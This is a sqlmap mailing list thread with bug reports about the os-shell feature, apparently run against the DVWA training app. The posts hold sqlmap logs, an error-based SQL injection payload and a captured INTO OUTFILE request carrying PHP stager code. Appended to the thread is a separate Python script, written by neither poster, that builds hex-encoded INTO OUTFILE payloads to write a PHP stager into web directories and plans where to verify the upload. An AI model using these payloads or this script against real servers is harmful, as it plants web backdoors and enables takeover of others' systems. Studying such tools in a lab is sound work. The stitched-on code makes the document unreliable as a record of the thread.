Thread: [sqlmap-users] os-shell bug
Brought to you by:
inquisb
From: ehmo <dis...@gm...> - 2009-08-23 21:31:57
[18:57:06] [INFO] testing stacked queries support on parameter 'ID'
[18:57:13] [INFO] the web application supports stacked queries on parameter 'ID'
[18:57:13] [INFO] testing if current user is DBA
[18:57:13] [INFO] retrieved: 0
[18:57:26] [WARNING] the functionality requested might not work because the session user is not a database administrator
[18:57:26] [INFO] checking if xp_cmdshell extended procedure is available, wait..
xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] y
[20:30:00] [ERROR] unhandled exception in sqlmap/0.8-dev1, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
sqlmap version: 0.8-dev1
Python version: 2.5.4
Operating system: win32
Traceback (most recent call last):
  File "c:\dev\sqlmap-dev\sqlmap.py", line 84, in main
    start()
  File "c:\dev\sqlmap-dev\lib\controller\controller.py", line 263, in start
    action()
  File "c:\dev\sqlmap-dev\lib\controller\action.py", line 140, in action
    conf.dbmsHandler.osShell()
  File "c:\dev\sqlmap-dev\plugins\generic\takeover.py", line 300, in osShell
    self.initEnv()
  File "c:\dev\sqlmap-dev\lib\takeover\abstraction.py", line 168, in initEnv
    self.xpCmdshellInit(mandatory)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 181, in xpCmdshellInit
    self.__xpCmdshellConfigure(1)
  File "c:\dev\sqlmap-dev\lib\takeover\xp_cmdshell.py", line 106, in __xpCmdshellConfigure
    if kb.dbmsVersion[0] in ( "2005", "2008" ):
IndexError: list index out of range
From: Robin W. <ro...@di...> - 2011-11-03 13:40:34
Attachments:
Screen Shot 2011-11-03 at 12.55.22.png
I think I've found a bug in the os-shell command when specifying extra directories to try to upload a shell file to. In this example I've told it the full document root is /opt/lampp/htdocs, but I've made a directory in there called uploads which has full write permissions. I specify the uploads directory when asked for additional web server paths, giving it the full server path of /opt/lampp/htdocs/uploads.

Watching the traffic in Burp, it first tries to upload to the root, which fails; it then tries the uploads directory, but when it checks to see if the file has been uploaded it checks for the temporary file in the vulnerabilities directory, not the uploads directory. It then tries an upload to the vulnerabilities directory (it has previously detected this, so I assume that is why it is trying it) and again fails, but it does try to check the right directory this time. I've attached a screenshot from Burp showing the hits.

Manually checking the uploads directory, it hasn't managed to upload the file even though it should be able to, as the directory is fully writable and the db is mysql running as root. I think this could be down to the query being sent across. I know the decoding here isn't quite right, but it is adding the PHP to the wrong place in the query:

GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE% %'%/opt%/lampp%/htdocs%/uploads%/tmpuzmzk.php%'% LINES% TERMINATí% BY% 0x<?php if (isset($_REQUEST["upload"])) { $dir=$_REQUEST["uploadDir"];

I'm doing all of this against DVWA with a manually created uploads directory.

Robin

sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080

sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:42:06

[12:42:07] [INFO] using '/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session file
[12:42:07] [INFO] resuming injection data from session file
[12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[12:42:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=12 AND (SELECT 6722 FROM(SELECT COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1 ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
---
[12:42:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[12:42:09] [INFO] going to use a web backdoor for command prompt
[12:42:09] [INFO] fingerprinting the back-end DBMS operating system
[12:42:09] [INFO] the back-end DBMS operating system is Linux
[12:42:09] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:42:12] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /opt/lampp/htdocs
[12:42:19] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]: /opt/lampp/uploads/
[12:42:30] [INFO] heuristics detected web page charset 'ascii'
[12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
[12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
[12:42:38] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs/vulnerabilities'
[12:42:38] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 3 times
[12:42:38] [INFO] Fetched data logged to text files under '/Users/robin/src/sqlmap-dev/output/192.168.56.101'

[*] shutting down at 12:42:38
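The two mechanics the thread turns on, written out as an added Python illustration (this is not sqlmap's code and not something either poster wrote): hex-encoding a PHP stager into a MySQL "LIMIT 1 INTO OUTFILE '...' LINES TERMINATED BY 0x..." fragment of the shape visible in the captured request, and deriving the URL at which to verify the write from the directory that was actually targeted, which is the step the second post reports going wrong. The function names, the target host, the candidate directory list and the cut-down stager body are assumptions chosen for the example.

```python
"""Added illustration for the thread above, not sqlmap's own code.

Two steps the second post describes: (1) writing a PHP file stager on the
database host with MySQL's SELECT ... INTO OUTFILE, and (2) working out
where the written file should be reachable over HTTP so the write can be
verified. Function names, URLs and paths are assumptions for the example.
"""
import posixpath
from typing import List, Optional
from urllib.parse import urljoin

# Constructed cut-down stager body, modelled on the start of the one visible
# in the captured request; any PHP would do for the purpose of this example.
STAGER_PHP = '<?php if (isset($_REQUEST["upload"])) { $dir=$_REQUEST["uploadDir"]; } ?>'


def build_outfile_payload(dest_path: str, content: str) -> str:
    """Return the fragment appended to an injectable SELECT so that MySQL
    writes `content` to `dest_path` on the database server.

    The body is passed as a hex literal (0x...), so quotes, newlines and
    '<?php' need no escaping and are written byte-for-byte. LIMIT 1 keeps
    the result to one row: that row's columns (tab-separated) are written
    first, then the "line terminator", i.e. the PHP. PHP ignores the
    leading row data because it sits outside the <?php ... ?> block.

    Preconditions the query does not check for you: the DB account needs
    the FILE privilege, secure_file_priv must permit the directory, the OS
    user mysqld runs as must be able to create the file there, and the
    file must not already exist (INTO OUTFILE never overwrites).
    """
    if "'" in dest_path or "\\" in dest_path:
        raise ValueError("destination path must not contain quotes or backslashes")
    hex_body = "0x" + content.encode("utf-8").hex()
    return f" LIMIT 1 INTO OUTFILE '{dest_path}' LINES TERMINATED BY {hex_body}"


def stager_url(base_url: str, docroot: str, written_path: str) -> Optional[str]:
    """Map the filesystem path the file was written to onto the URL the web
    server would serve it at, or None if the path lies outside the document
    root (possibly writable, but never reachable over HTTP).

    The verification request must be derived from the directory that was
    actually written to; checking a different directory, as the post
    reports, makes a successful write look like a failure.
    """
    root = posixpath.normpath(docroot)
    path = posixpath.normpath(written_path)
    prefix = root.rstrip("/") + "/"
    if not path.startswith(prefix):
        return None
    return urljoin(base_url.rstrip("/") + "/", path[len(prefix):])


def plan_stager_uploads(base_url: str, docroot: str, candidate_dirs: List[str],
                        filename: str, content: str = STAGER_PHP) -> List[dict]:
    """For each candidate directory, produce the destination path, the SQL
    fragment that writes the stager there, and the URL to verify it at."""
    plan = []
    for directory in candidate_dirs:
        dest = posixpath.join(posixpath.normpath(directory), filename)
        plan.append({
            "path": dest,
            "payload": build_outfile_payload(dest, content),
            "verify_url": stager_url(base_url, docroot, dest),
        })
    return plan


if __name__ == "__main__":
    # Directories taken from the thread (document root, the extra directory,
    # the previously detected 'vulnerabilities' directory); the target host
    # is assumed from the session path in the second post's output.
    for entry in plan_stager_uploads(
        "http://192.168.56.101/", "/opt/lampp/htdocs",
        ["/opt/lampp/htdocs", "/opt/lampp/htdocs/uploads",
         "/opt/lampp/uploads/", "/opt/lampp/htdocs/vulnerabilities"],
        "tmpuzmzk.php",
    ):
        print(entry["path"], "->", entry["verify_url"] or "not web-reachable")
```

Running it shows that a directory outside the document root yields no URL to check at all, while every directory under it maps to exactly one URL, which is the one the post-upload check has to request.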